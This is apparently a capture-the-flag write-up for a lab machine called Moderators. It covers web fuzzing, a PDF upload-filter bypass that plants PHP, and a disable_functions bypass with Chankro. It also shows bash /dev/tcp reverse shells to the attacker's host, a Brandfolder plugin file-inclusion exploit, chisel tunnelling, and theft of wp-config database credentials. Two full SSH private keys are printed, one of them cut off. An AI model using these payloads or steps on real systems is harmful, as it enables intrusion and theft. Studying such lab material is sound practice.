Moderators Write-Up

Initial Recon

Nmap

Starting with a full tcp port scan using nmap, I got the following results:

$ nmap -sC -sV -vvv -oN nmap/nmap-all-tcp.txt -p- 10.10.11.173

Nmap scan report for 10.10.11.173
Host is up, received syn-ack (0.14s latency).
Scanned at 2022-08-12 20:36:48 EEST for 442s
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 39:03:16:06:11:30:a0:b0:c2:91:79:88:d3:93:1b:3e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDVKTX9lrW0T2kgN/idXDQgowtSSGNJiULsNel0JKKX42GCLWDVSaDcZCcuPsxwxOYxSvEPmU8N7ZLka7rFJNBSbnlnfI4pP8r2ZYwB4Ioa+mJ7lkdmexkabiDupyue1hd2QNJ8mHjmPNd9LByhOq+CsXTdXe50qkhnSxil8inp8r4zAFDwWYCpjt2EeBKqqyWSlQptU+mjLfIP7903sUfLNhkKtEdEJfiGfpfd4QYCVWmqsWPD0q/S69/mDZ7Ic0Bhj4VVXVQkkxDIyG3NmNtY1dF/uxvB86Ca+q/bO0PUZ/PEI2EaoXydS5YVHb2ZxLy17ltoDC0JW+wogVe/+NV75tqOQESQfyqFTZOnpq2jBgrXq90FczUr1Rl/7JQZ4V5nt+asvhxFRs94qxidRdf60aP/Izgkg1UltttQCS4s984Lfnfmk1LVlJ74Q/QMZZIGdRf8HwZzqqW/zBLozU0FbSdq8kOXFhZDeLqCfrVLvBncD3fHjKj+h7gSq3nFbWk=
|   256 51:94:5c:59:3b:bd:bc:b6:26:7a:ef:83:7f:4c:ca:7d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIEFsa05VSw1Z4FCOfBS4hGgxc7g6Z9Giortn/lxqktVOBrkAyUfJRs7AteBGqIyjHNOQJi97xMufArOj4vQJwU=
|   256 a5:6d:03:fa:6c:f5:b9:4a:a2:a1:b6:bd:bc:60:42:31 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP3W656yOHPoAqoWckwZsh/ZzF1IX/9rN+LB9MkS56OI
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Moderators
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug 12 20:44:10 2022 -- 1 IP address (1 host up) scanned in 442.82 seconds

I can see that ports 80 (webserver) and 22 (SSH) are open.

Surfing The Webpage

Looks like it is a website that provides some security services.

Home Page

And has some pages that I can navigate to: Home Page Footer

The most interesting page was the blog page where they disclosed some vulnerabilities that they have found for customers:

Blog Page

Blog Reports

Discovering Hidden Reports

And it appears that some of these listed reports have links refering to them, by providing their ID as a GET parameter, but some others don’t. However, the available reports didn’t provide useful information, so I though of bruteforcing the numbers looking for some hidden reports.

I’ll use WFuzz with the -z range, flag to specify the range of numbers to use as payload:

$ wfuzz -z range,0-20000 -u http://10.10.11.173/reports.php?report=FUZZ --hc 302 --hh 7888
 
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.11.173/reports.php?report=FUZZ
Total requests: 20001

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                            
=====================================================================

000002590:   200        274 L    523 W      9786 Ch     "2589"                                                                                                                                             
000003479:   200        275 L    526 W      9831 Ch     "3478"                                                                                                                                             
000004222:   200        273 L    523 W      9880 Ch     "4221"                                                                                                                                             
000007613:   200        275 L    523 W      9790 Ch     "7612"                                                                                                                                             
000008122:   200        273 L    522 W      9784 Ch     "8121"                                                                                                                                             
000009799:   200        276 L    525 W      9887 Ch     "9798"                                                                                                                                             

Total time: 0
Processed Requests: 20001
Filtered Requests: 19995
Requests/sec.: 0

Discovering An Information Disclosure

Navigating through newly discovered reports, I found that the report with id 9798 shows an information disclosure in /logs/e21cece511f43a5cb18d4932429915ed/.

Report 9798

The last part looks like an md5 hash so I’ll try to crack it using hashcat:

$ hashcat -a 0 -m 0 e21cece511f43a5cb18d4932429915ed /usr/share/wordlists/rockyou.txt

...
e21cece511f43a5cb18d4932429915ed:9798
...

It looks like the hash of the report’s ID is the one used here.

Discovering PDF Logs

From the service.php page, I saw that they only accept PDF files:

PDF Files Notice

Using this information, I will try to bruteforce files of /logs/e21cece511f43a5cb18d4932429915ed/ by appending .pdf at the end of each wordlist keyword from raft-medium-words.txt, using Ffuf:

$ ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -u http://10.10.11.173/logs/e21cece511f43a5cb18d4932429915ed/FUZZ.pdf

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.173/logs/e21cece511f43a5cb18d4932429915ed/FUZZ.pdf
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

.html                   [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 88ms]
logs                    [Status: 200, Size: 10059, Words: 754, Lines: 220, Duration: 131ms]
.htm                    [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 3880ms]
.htaccess               [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 81ms]
...

I found logs.pdf being present in this directory, however it shows that logs are removed.

Logs Removed

Discovering a Hidden Upload Functionalitiy

Cycling through other report’s logs, I found that there are few of them disclosing /logs/report_log_upload.php path that appears to be the hidden way to upload files to the application.

Making a list of md5 hashes for each report:

$ cat report_number.txt 
2589
3478
4221
7612
8121
9798

$ for nums in $(cat report_number.txt); do echo -n $nums "=> "; echo -n $nums|md5sum; done > report_hashes
$ cat report_hashes 
2589 => 743c41a921516b04afde48bb48e28ce6  -
3478 => b071cfa81605a94ad80cfa2bbc747448  -
4221 => 74d90aafda34e6060f9e8433962d14fd  -
7612 => ce5d75028d92047a9ec617acb9c34ce6  -
8121 => afecc60f82be41c1b52f6705ec69e0f1  -
9798 => e21cece511f43a5cb18d4932429915ed  -

Upload.php Leak

Upload.php Page

I’ll try to upload a dummy file and intercept the request with Burp Suite:

Intercepting Request With BurpSuite

From the repeater tab, I tried to send the request as is, howerver I got an error that only PDF are allowed:

Only PDF Files Are Allowed

Learing How PDF Validation Works

So I need to know how this restriction is applied, in other words, I need to know if the application is checking the extension or the content of the uploaded file, or both, or even the Content-Type http header, to know if I can find some possible bypasses.

I’ll try to upload the same dummy file content, but this time I’ll change its extension to .pdf:

Changing File Extension

I got the same error, which means that the backend is doing some other checks, so now I’ll change the Content-Type header value to application/pdf:

Changing Content-Type header value

Again same error.

This time, I’ll alter the content of the file by adding a valid PDF header at the beginning (also called magic bytes or file signature):

A list of file signature for various file types can be found here: https://en.wikipedia.org/wiki/List_of_file_signatures

In my case, this is the hex representation of pdf magic bytes 25 50 44 46 2D, and this is the ascii representation %PDF-:

File Upload Worked

My dummy file has been uploaded successfully!! If I try to remove any of the previous changes the server will not accept it, which means that it is checking for everyone of these three.

Uploading PHP Files To Run Code

Now that I identified what the server is checking, I need to find a way to bypass this checking and upload a malicious php file.

First thing I’ll try is to change the extension to .pdf.php, because sometimes servers check only for .pdf in the filename without making sure that it comes at the end:

Uploading A PHP File

And it worked!! Now, I am able to upload php files to the server. However, I still don’t know the location where these files are being stored. That’s why I’ll try to bruteforce directories inside /logs/ looking for any hidden one where I can find these uploaded files.

I’ll use Gobuster and common.txt wordlist from SecLists:

$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.10.11.173/logs/

===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.11.173/logs/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/04 14:13:20 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/css                  (Status: 301) [Size: 315] [--> http://10.10.11.173/logs/css/]
/index.html           (Status: 200) [Size: 0]
/uploads              (Status: 301) [Size: 319] [--> http://10.10.11.173/logs/uploads/]
Progress: 4704 / 4714 (99.79%)===============================================================
2022/11/04 14:14:16 Finished
===============================================================

Uploads directory has been found, however looks like directory listing is disabled in it, but this is not a problem because I can try to access the temp.pdf.php that I uploaded previously:

Accessing temp.pdf.php

Worked!!

It’s time to uplaod some php code to get a reverse shell.

The first thing I’ll do is execute phpinfo() function to see if there are any disabled functions like system(), exec() … which will prevent me from running commands on the target system.

Uploading phpinfo()

Disable Functions

Unfortunately most useful functions are disabled. I need to find other ways to get a shell on the target.

Bypassing Disable Functions using mail() To Get RCE

After googling a little bit, I came accross this blog post about how to bypass disable_functions in php.

And using chankro, I can create a malicious php file that will allow me to get a reverse shell once I navigate to the uploaded file:

$ cat rev.sh 
bash -c 'bash -i >& /dev/tcp/10.10.16.6/1234 0>&1'

$ python2 /opt/Chankro/chankro.py --arch 64 --input rev.sh --output chan.php --path /dev/shm


     -=[ Chankro ]=-
    -={ @TheXC3LL }=-


[+] Binary file: rev.sh
[+] Architecture: x64
[+] Final PHP: chan.php


[+] File created!

$ ls -la
total 28
drwxr-xr-x 2 kali kali  4096 Nov  4 15:59 .
drwxr-xr-x 7 kali kali  4096 Nov  3 21:07 ..
-rw-r--r-- 1 kali kali 11710 Nov  4 15:58 chan.php
-rw-r--r-- 1 kali kali    51 Nov  4 15:56 rev.sh

–arch to specify the architecture.
–input to specify the that contains the malicious file to be executed.
–output to specify the output file.
–path to specify the path where some necessary files will be written, in this case I chose /dev/shm which is a linux directory writable by everyone similar to /tmp.

After executing the command, a new php file called chan.php will be created that holds the necessary payload to get a reverse shell. So what I’ll do is create a new file rev.pdf.php that contains initailly the magic bytes %PDF-, then append to it the content of chan.php and finally upload it to the server using curl:

$ curl -s -XPOST http://10.10.11.173/logs/report_log_upload.php -F "pdfFile=@rev.pdf.php;type=application/pdf" -F "administrator=true"

...
<p style='color:white'><big size='5'>File uploaded successfully!</big></p>
...

-s to specify silent mode (usually used when piping curl’s output so that no download banner will appear).
-X followed by the request method (space is not necessary but also not required).
-F to specify the data sent, however it will be sent using multipart/form-data content-type. Data looks like this: ‘[parameter name]=[value];[headers specific only to current data]=[value]’.
- In this case, pdfFile was the file paramater name, @ is used to get the content of the file and use it as value.
- type header is the Content-Type header specific to the file being sent, in this case application/pdf.
- Finally, as seen using Burp Suite, other data were being sent with the file, of parametername administrator and value true.

Getting Reverse Shell

Post Enumeration As www-data

Using netstat command, I can see that port 8080 is open but only accessible locally:

www-data@moderators:/var/www/html/logs/uploads$ netstat -lntp
netstat -lntp

(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -

I’ll use curl to have an idea of what web application is running on port 8080:

www-data@moderators:/var/www/html/logs/uploads$ curl http://127.0.0.1:8080/

...
Proudly powered by <a href="https://wordpress.org/">WordPress</a>.
...

Looks like wordpress is running on this port. If I list all running processes using ps command, I get the following results:

www-data@moderators:/var/www/html/logs/uploads$ ps aux

...
lexi         886  0.0  1.4 306748 59116 ?        S    05:39   0:03 /usr/bin/php -S 127.0.0.1:8080 -t /opt/site.new/
...

User Lexi is running this server form /opt/site.new/. Taking a quick look at the files inside, specifically at the plugins installed on this wordpress instance to see if I can find some exploits.

www-data@moderators:/opt/site.new/wp-content/plugins$ ls -la
ls -la

total 20
drwxr-xr-x 4 lexi moderators 4096 Jul 14 10:50 .
drwxr-xr-x 6 lexi moderators 4096 Nov  4 12:00 ..
drwxr-xr-x 2 lexi moderators 4096 Jul 14 10:50 brandfolder
-rw-r--r-- 1 lexi moderators   28 Sep 11  2021 index.php
drwxr-xr-x 5 lexi moderators 4096 Jul 14 10:50 passwords-manager

Discovering Vulnerable Wordpress Plugin

I can see two installed plugins, brandfolder and passwords-manager. Using searchsploit, I found that brandfolder version 3.0 had Local/Remote File Inclusion.

$ searchsploit brandfolder

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                    |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Brandfolder 3.0 - Local/Remote File Inclusion                                                                                                                    | php/webapps/39591.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Now, I need to make sure if brandfolder version 3.0 is the one used in this instance:

www-data@moderators:/opt/site.new/wp-content/plugins/brandfolder$ head brandfolder.php

<?php
/*
Plugin Name: Brandfolder
Plugin URI: http://wordpress.org/plugins/brandfolder/
Description: Adds the ability for you to edit your Brandfolder inside Wordpress, easily embed it using our Popup Embed, and integrates with the Media Library.
Version: 3.0
Author: Brandfolder, Inc.
Author URI: http://brandfolder.com
License: GPLv2
*/

It is confirmed now that the vulnerable version 3.0 is being used.

The vulnerability is as follows:

$ cat /usr/share/exploitdb/exploits/php/webapps/39591.txt

# Exploit Title: Wordpress brandfolder plugin / RFI & LFI
# Google Dork: inurl:wp-content/plugins/brandfolder
# Date: 03/22/2016
# Exploit Author: AMAR^SHG
# Vendor Homepage: https://brandfolder.com
# Software Link: https://wordpress.org/plugins/brandfolder/
# Version: <=3.0
# Tested on: WAMP / Windows

I-Details
The vulnerability occurs at the first lines of the file callback.php:

<?php
  ini_set('display_errors',1);
  ini_set('display_startup_errors',1);
  error_reporting(-1);

  require_once($_REQUEST['wp_abspath']  . 'wp-load.php');
  require_once($_REQUEST['wp_abspath']  . 'wp-admin/includes/media.php');
  require_once($_REQUEST['wp_abspath']  . 'wp-admin/includes/file.php');
  require_once($_REQUEST['wp_abspath']  . 'wp-admin/includes/image.php');
  require_once($_REQUEST['wp_abspath']  . 'wp-admin/includes/post.php');

$_REQUEST is based on the user input, so as you can guess,
an attacker can depending on the context, host on a malicious server
a file called wp-load.php, and disable its execution using an htaccess, or
abuse the null byte character ( %00, %2500 url-encoded)

II-Proof of concept
http://localhost/wp/wp-content/plugins/brandfolder/callback.php?wp_abspath=LFI/RFI
http://localhost/wp/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00
http://localhost/wp/wp-content/plugins/brandfolder/callback.php?wp_abspath=http://evil/

Discovered by AMAR^SHG (aka kuroi'sh).
Greetings to RxR & Nofawkx Al & HolaKo

Exploiting The Vulnerability To Get User

In brief, the vulnerability consists of wp_abspath variable, which is used as a directory where all the other files will be loaded, can be passed as user input. This means that I can pass my own wp_abspath, which will be pointing to a directory or web server containing malicious files having the same name as the ones required in the main php file, and force the server to run my malicious code.

So, what I’ll do is create a file called wp-load.php inside any writable directory, in my case /dev/shm, which will contain php system function that will execute a reverse shell back to me:

www-data@moderators:/dev/shm$ echo '<?php system("bash -c \"bash -i >& /dev/tcp/10.10.16.32/8989 0>&1\"") ?>' > wp-load.php
www-data@moderators:/dev/shm$ curl http://127.0.0.1:8080/wp-content/plugins/brandfolder/callback.php?wp_abspath=/dev/shm/

Lexi Reverse Shell

Post Enumeration As Lexi

Issuing the id command, I noticed that lexi is part of moderators group, and using find command, I was able to get every file owned by this group:

lexi@moderators:~$ find / -group moderators 2>/dev/null

/opt/site.new
/opt/site.new/wp-trackback.php
/opt/site.new/readme.html
/opt/site.new/wp-signup.php
/opt/site.new/xmlrpc.php
/opt/site.new/wp-config.php
....

It appears that this group owns wordpress site’s files.

PortForwarding Wordpress

Previously, I didn’t fully interact with the site to see what’s really going on, so this time I’ll use chisel to port forward the site to my attaching machine:

On my attacking machine:

$ /opt/chisel/chisel_1.7.7_linux_amd64 server -p 9001 --reverse

On the target machine:

lexi@moderators:~$ ./chisel_1.7.7_linux_amd64 client 10.10.16.32:9001 R:127.0.0.1:8080:127.0.0.1:8080 &

However before portforwarding, I need to kill my reverse shell, because now wordpress site is hanging, so I’ll copy /home/lexi/.ssh/id_rsa to my machine, then SSH from there as lexi and continue working:

lexi@moderators:/opt/site.new/wp-content/plugins/brandfolder$ cat /home/lexi/.ssh/id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

SSH as lexi:

$ chmod 600 lexi_id_rsa
$ ssh -i lexi_id_rsa lexi@10.10.11.173

lexi@moderators:~$ id
uid=1001(lexi) gid=1001(lexi) groups=1001(lexi),1002(moderators)

Nevertheless, when I access the site from my machine, it looks very ugly:

Accessing Wordpress First Time

So, I’ll press [CTRL + U] on my keyboard to view the source code of this site:

Investigating The Error

It appears that the error is comming from moderators.htb being the domain accessed by default to load files. To fix this, I need to add moderators.htb to my /etc/hosts file in the 127.0.0.1 entry.

$ head -n 1  /etc/hosts

127.0.0.1	localhost , moderators.htb

Now, if I try to access it again everything should work fine:

Accessing The Site Again

Logging In As Admin

Previously, when I was listing installed plugins, I saw passwords-manager being installed, so this time I’ll try to login as admin and see if I can find passwords for other users stored in there. However, I don’t know the admin’s password, but I can login to the database with credentials from wp-config.php file and change his password to anything I want:

lexi@moderators:/opt/site.new$ cat wp-config.php | grep -A 10 "The name of the database" 

/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'wordpressuser' );

/** MySQL database password */
define( 'DB_PASSWORD', 'wordpresspassword123!!' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

Credentials for wordpress database are wordpressuser:wordpresspassword123!!.

lexi@moderators:/opt/site.new$ mysql -u wordpressuser -p'wordpresspassword123!!'
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 48
Server version: 10.3.34-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| wordpress          |
+--------------------+
2 rows in set (0.001 sec)

MariaDB [(none)]> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+----------------------+-------------------------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email           | user_url                | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+----------------------+-------------------------+---------------------+---------------------+-------------+--------------+
|  1 | admin      | $P$BXasOiM52pOUIRntJTPVlMoH0ZlntT0 | admin         | admin@moderators.htb | http://192.168.1.4:8080 | 2021-09-11 05:30:20 |                     |           0 | admin        |
|  2 | lexi       | $P$BZ0Fj92qgnvg4F52r3lpwHejcXag461 | lexi          | lexi@moderators.htb  |                         | 2021-09-12 16:51:16 |                     |           0 | lexi         |
+----+------------+------------------------------------+---------------+----------------------+-------------------------+---------------------+---------------------+-------------+--------------+
2 rows in set (0.001 sec)

Looks like there are only two users, admin and lexi. I can try to crack the password for admin to be stealthier, however I wasn’t able to do that using rockyou.txt, that’s why I’ll generate a new password using any tool, in this case I used https://www.useotools.com/wordpress-password-hash-generator/, and update the entry manually through mysql:

Generate New Password

It does even provide me with needed sql query!!

MariaDB [wordpress]> UPDATE `wp_users` SET `user_pass` = '$P$BBUC3gCfCOoL46jYqzCCIyiLZcY3YG.' WHERE user_login = "admin";
Query OK, 1 row affected (0.003 sec)
Rows matched: 1  Changed: 1  Warnings: 0

Now I should be able to login using the new password:

Logging In With New Credentials

Reading John’s SSH Keys

Navigating to the passwords-manager plugin, I saw that user john is storing his ssh keys:

Noticing John’s SSH Keys

After copying the key to a new file, I can SSH as john:

$ cat john_id_rsa 

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAn/Neot2K7OKlkda5TCHoWwP5u1hHhBwKzM0LN3hn7EwyXshgj9G+
lVSMVOUMeS5SM6iyM0Tg82EVfEbAMpPuCGbWvr1inU8B6eDb9voLQyGERcbKf29I7HwXab
8T+HkUqy+CLm/X+GR9zlgNhNUZgJePONPK1OLUkz/mJN9Sf57w8ebloATzJJyKNAdRg3Xq
HUfwDldCDZiTTt3R6s5wWkrRuZ6sZp+v+RonFhfT2Ue741CSULhS2fcIGCLRW+8WQ+M0yd
q76Ite2XHanP9lrj3de8xU92ny/rjqU9U6EJG0DYmtpLrkbGNLey9MjuFncBqQGnCaqfFk
HQb+S6eCIDD0N3W0flBMhJfzwxKYXpAJSlLElqhPJayinWXSZqBhbp8Bw3bs4RCHbtwawu
SefWzZEsdA0wGrbbuopaJX1UpyuAQb2UD5YRDaSC2V2Rv4Wi/32PxoKyAxj1x6w2wR5yty
EoFzVfdeKQ8o5Avl4MM6gqC5qaubduLABhsEXflrAAAFiPtk5tj7ZObYAAAAB3NzaC1yc2
EAAAGBAJ/zXqLdiuzipZHWuUwh6FsD+btYR4QcCszNCzd4Z+xMMl7IYI/RvpVUjFTlDHku
UjOosjNE4PNhFXxGwDKT7ghm1r69Yp1PAeng2/b6C0MhhEXGyn9vSOx8F2m/E/h5FKsvgi
5v1/hkfc5YDYTVGYCXjzjTytTi1JM/5iTfUn+e8PHm5aAE8yScijQHUYN16h1H8A5XQg2Y
k07d0erOcFpK0bmerGafr/kaJxYX09lHu+NQklC4Utn3CBgi0VvvFkPjNMnau+iLXtlx2p
z/Za493XvMVPdp8v646lPVOhCRtA2JraS65GxjS3svTI7hZ3AakBpwmqnxZB0G/kungiAw
9Dd1tH5QTISX88MSmF6QCUpSxJaoTyWsop1l0magYW6fAcN27OEQh27cGsLknn1s2RLHQN
MBq227qKWiV9VKcrgEG9lA+WEQ2kgtldkb+Fov99j8aCsgMY9cesNsEecrchKBc1X3XikP
KOQL5eDDOoKguamrm3biwAYbBF35awAAAAMBAAEAAAGBAJsfhQ2AvIZGvPp2e5ipXdY/Qc
h+skUeiR7cUN+IJ4mU0Fj6DiQM77+Vks+WoAU6dkBhgAmW6G9BHXw8hZPHwddmHSg5NdWI
VTvEdq/NCnUdoVGmnKcAf4HSS0akKLMWgoQO/Dsa/yKIGzauUNYdcbEzy5P6W0Ehh7YTB5
mE+FaLB/Qi0Vni0wgTxTj2TAipp9aj+N1/pLDY4yxeloIZmf8HhuR1TY/tmNWGlpenni6g
kki/0Fb2nGuFV9VIlzCI6s7++ARLTUysVDhCB0H5Urxey4Ynxu9NWejsf6QAZibAZSb6il
uerZYKiiJD0pmDBY1ApJhNE+tafeIeX1EyPgq9yGKUXZEI1VE0rITGbpHPjYAnn7yhLDQ9
rcrFW/SaR80ulolwQRm+4J8TEHAVYGzshNZ2tvrYDVGOT/OvFObOK7kRHHKJBVL6I96htc
vSzN5qGw3+I7YJKTrXJwJ5vEjjelmyK82FXquUcubMTW6/B72QNW7zjRgLGGObpWWV+QAA
AMAE4VjUADP53GgSVYpLBnR+69RVBqc5h3U3D6zButs/m7xsMoIoBrkv342fsK4qkBYWFU
sdCOXDQUGYcVdzXKwzRsKslGOAnyeRsg9wYsVhcc1YSWIJZBdBIaqPBKcfsVGUM88icxqk
Qn6CEN4Bwy0ZgB/SAXMMU8IQHtcfZQFeiByg0/XRlvZuQay6Cw6/406dlzTJDmzGzkzX08
